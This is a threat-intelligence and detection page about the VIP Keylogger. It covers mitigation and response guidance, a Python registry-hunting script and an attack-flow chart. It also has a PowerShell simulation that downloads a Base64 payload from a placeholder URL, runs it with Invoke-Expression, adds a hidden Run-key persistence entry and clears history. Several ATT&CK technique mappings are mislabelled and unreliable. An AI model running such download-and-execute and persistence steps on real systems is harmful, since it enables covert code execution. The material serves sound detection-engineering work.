SOC Prime Bias: Medium

18 May 2026 19:04 UTC

VIP Keylogger and Its Multi-Layered Evasion Tactics

SOC Prime Team

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Summary

VIP Keylogger is a modular information-stealing threat delivered through phishing lures such as fake bank payment alerts. Its infection chain relies on malicious VBS, JavaScript, or batch-based loaders that use heavy obfuscation, steganography in PNG images, and abuse of environment variables to conceal PowerShell stages before launching the final keylogger. Once active, the malware captures credentials, screenshots, clipboard contents, and Wi-Fi passwords, then exfiltrates the data through multiple command-and-control channels. Detection efforts should focus on suspicious registry changes, unusual environment variable values, and abnormal transitions from script execution to binary payloads.

Investigation

The Splunk Threat Research Team reviewed more than 200 loader samples collected in March and April 2026, documenting their naming patterns, loader variants, and the steganographic use of PNG files for payload delivery. Researchers reproduced the deobfuscation process, identified abuse of the INTERNAL_DB_CACHE environment variable, and traced persistence to the UserInitMprLogonScript registry key. The report also mapped each observed behavior to relevant MITRE ATT&CK techniques to support detection engineering.

Mitigation

Organizations should stop the initial phishing attempts through stronger email security controls and URL filtering. Defenders should monitor creation and modification of HKCU\Environment values, especially oversized entries or use of the INTERNAL_DB_CACHE variable. Execution of script-based loaders from user-writable directories should be restricted, and PowerShell Constrained Language Mode should be enforced where possible. Endpoint security tools should also detect process injection into aspnet_compiler.exe and suspicious netsh activity.

Response

If a VIP Keylogger indicator is detected, isolate the affected host, collect volatile memory and recent process execution logs, and hunt for the known registry artifacts, PNG-based command-and-control URLs, and dropped files. The malicious scripts should be removed, exposed credentials reset, and a broader sweep should be conducted across the environment for related loader artifacts and persistence mechanisms.
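As an added example (not code from the SOC Prime page or the Splunk report), the following Python applies the hunting checks named in the Mitigation and Response sections to constructed Sysmon Event ID 13 (registry value set) records: writes to HKCU\Environment that are oversized or target INTERNAL_DB_CACHE, and the UserInitMprLogonScript logon-script value. Field names follow Sysmon's RegistryEvent schema; the sample records, the 2048-character threshold and the script-host list are assumptions.

```python
import re

# Constructed Sysmon Event ID 13 (RegistryEvent: value set) records for one user
# hive; sample inputs only, not telemetry from the report. Sysmon renders HKCU
# paths under HKU\<SID>, which the regex below relies on.
SAMPLE_EVENTS = [
    {"EventID": 13, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "TargetObject": r"HKU\S-1-5-21-1111\Environment\INTERNAL_DB_CACHE",
     "Details": "A" * 6000},                      # oversized staged payload
    {"EventID": 13, "Image": r"C:\Windows\explorer.exe",
     "TargetObject": r"HKU\S-1-5-21-1111\Environment\TEMP",
     "Details": r"C:\Users\alice\AppData\Local\Temp"},
    {"EventID": 13, "Image": r"C:\Windows\System32\wscript.exe",
     "TargetObject": r"HKU\S-1-5-21-1111\Environment\UserInitMprLogonScript",
     "Details": r"C:\Users\alice\AppData\Roaming\update.vbs"},
    {"EventID": 13, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "TargetObject": r"HKU\S-1-5-21-1111\Software\Microsoft\Windows\CurrentVersion\Run\OneDrive",
     "Details": r"C:\Program Files\OneDrive\OneDrive.exe"},
]

ENV_VALUE_RE = re.compile(r"^HKU\\[^\\]+\\Environment\\(?P<name>[^\\]+)$", re.IGNORECASE)
# Value names called out in the report: the staging variable and the logon-script key.
WATCHED_NAMES = {"internal_db_cache", "userinitmprlogonscript"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe", "cmd.exe"}

def analyze_registry_events(events, max_value_len=2048):
    """Return one finding per suspicious HKCU\\Environment write.
    max_value_len is an assumed threshold for "oversized" entries; tune it to
    the longest legitimate value (typically PATH) seen in your own baseline.
    """
    findings = []
    for ev in events:
        match = ENV_VALUE_RE.match(ev.get("TargetObject", ""))
        if ev.get("EventID") != 13 or not match:
            continue                                  # not an Environment value write
        name = match.group("name")
        details = ev.get("Details", "")
        image = ev.get("Image", "").rsplit("\\", 1)[-1].lower()
        reasons = []
        if name.lower() in WATCHED_NAMES:
            reasons.append(f"watched value name {name}")
        if len(details) > max_value_len:
            reasons.append(f"oversized value ({len(details)} chars)")
        if reasons and image in SCRIPT_HOSTS:         # script host adds weight, not a hit alone
            reasons.append(f"written by script host {image}")
        if reasons:
            findings.append({"target": ev["TargetObject"], "image": image, "reasons": reasons})
    return findings
```

Routine writes by explorer.exe (TEMP) and Run-key changes outside HKCU\Environment are left alone, so the output is a short triage list rather than every registry event.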

Attack Flow

    graph TB
        %% Class definitions
        classDef action fill:#99ccff
        classDef technique fill:#ffcc99
        classDef operator fill:#ff9900

        %% Nodes
        initial_access["<b>Action</b> – <b>T1566 Phishing</b><br/>Malicious .vbs/.js/.bat delivered via email"]
        class initial_access action
        execution["<b>Action</b> – <b>T1059.005 Visual Basic</b>, <b>T1059.007 JavaScript</b>, <b>T1059.001 PowerShell</b><br/>Script stagers executed on the host"]
        class execution action
        obfuscation["<b>Action</b> – <b>T1027.016 Junk Code Insertion</b>, <b>T1027.003 Steganography</b>, <b>T1027.009 Embedded Payloads</b><br/>Payloads hidden or disguised"]
        class obfuscation action
        persistence["<b>Action</b> – <b>T1574.007 Hijack Execution Flow</b> via Registry Logon Script (UserInitMprLogonScript)<br/><b>T1037.001 Boot Logon Init Script</b><br/>Ensures code runs at logon"]
        class persistence action
        priv_esc["<b>Action</b> – <b>T1055.002 Process Injection PE</b>, <b>T1055.001 DLL Injection</b>, <b>T1620 Reflective Code Loading</b><br/>Escalates privileges and evades defenses"]
        class priv_esc action
        credential_access["<b>Action</b> – <b>T1555.003 Browser Data</b>, <b>T1056.001 Keylogging</b>, <b>T1115 Clipboard Hijacking</b><br/>Collects user credentials"]
        class credential_access action
        discovery["<b>Action</b> – <b>T1596.005 External IP Discovery</b> via public services<br/><b>T1016.002 Wi-Fi Password Discovery</b><br/>Gathers network information"]
        class discovery action
        collection["<b>Action</b> – <b>T1113 Screen Capture</b><br/>Collects visual data from the desktop"]
        class collection action
        c2["<b>Action</b> – <b>T1071.001 Web Protocols</b> and Telegram bot API<br/>Provides remote command and control"]
        class c2 action
        defense_evasion["<b>Action</b> – <b>T1070.004 File Deletion</b>, <b>T1070.010 Indicator Removal</b><br/>Removes evidence after operation"]
        class defense_evasion action

        %% Connections showing attack flow
        initial_access -->|leads_to| execution
        execution -->|leads_to| obfuscation
        obfuscation -->|leads_to| persistence
        persistence -->|leads_to| priv_esc
        priv_esc -->|leads_to| credential_access
        credential_access -->|leads_to| discovery
        discovery -->|leads_to| collection
        collection -->|leads_to| c2
        c2 -->|leads_to| defense_evasion

Simulation Execution

Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.

Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic. Abstract or unrelated examples will lead to misdiagnosis.

  • Attack Narrative & Commands:

    1. Initial Recon – the attacker runs Get-ADDomain (T1016.002) to discover domain trust relationships.
    2. Payload Acquisition – using Invoke-WebRequest (T1071.001) the attacker downloads a Base64‑encoded DLL that implements the keylogger (T1056.001).
    3. Staging via Environment Variable – the downloaded string is stored in a user‑level environment variable through [Environment]::SetEnvironmentVariable. This step satisfies the detection rule’s focus on environment‑variable manipulation.
    4. Dynamic Execution – the attacker immediately executes the payload with Invoke-Expression $env:VIPPayload (T1059.001). The keylogger begins capturing keystrokes, screenshots (T1113), and clipboard data (T1115).
    5. Cleanup – after establishing persistence (e.g., creating a Run key, T1037.001), the attacker deletes the temporary DLL from disk (T1070.004) and removes the environment variable to reduce forensic footprint.
  • Regression Test Script: The script below reproduces the exact steps and generates the telemetry the Sigma rule expects.

    # VIP Keylogger Simulation – PowerShell
    # -------------------------------------------------
    # 1. Download a dummy payload (Base64‑encoded string)
    $payloadUrl = "https://raw.githubusercontent.com/example/dummy-keylogger/main/payload.b64"
    $b64Payload = (Invoke-WebRequest -Uri $payloadUrl -UseBasicParsing).Content.Trim()
    
    # 2. Store payload in a user‑level environment variable
    $envVarName = "VIPPayload"
    [Environment]::SetEnvironmentVariable($envVarName, $b64Payload, "User")
    
    # 3. Decode and execute the payload via Invoke‑Expression
    $decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($b64Payload))
    Invoke-Expression $decoded
    
    # 4. (Optional) Persist via Run key – demonstrates T1037.001
    #    The Run value must decode the variable again at logon, since it holds Base64.
    $runKey = "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run"
    $runCmd = "powershell -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command `"Invoke-Expression ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(`$env:$envVarName)))`""
    Set-ItemProperty -Path $runKey -Name "VIPKeylogger" -Value $runCmd
    
    # 5. Cleanup – remove the environment variable and the Run key entry
    Start-Sleep -Seconds 30   # allow some activity to be logged
    Remove-ItemProperty -Path $runKey -Name "VIPKeylogger" -ErrorAction SilentlyContinue
    [Environment]::SetEnvironmentVariable($envVarName, $null, "User")
  • Cleanup Commands: Run these commands to return the system to a pristine state after the test.

    # Remove the environment variable created for the test
    [Environment]::SetEnvironmentVariable("VIPPayload", $null, "User")
    
    # Delete the persistence Run key entry if it exists
    $runKey = "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run"
    Remove-ItemProperty -Path $runKey -Name "VIPKeylogger" -ErrorAction SilentlyContinue
    
    # Clear any residual PowerShell history entries (optional)
    Clear-History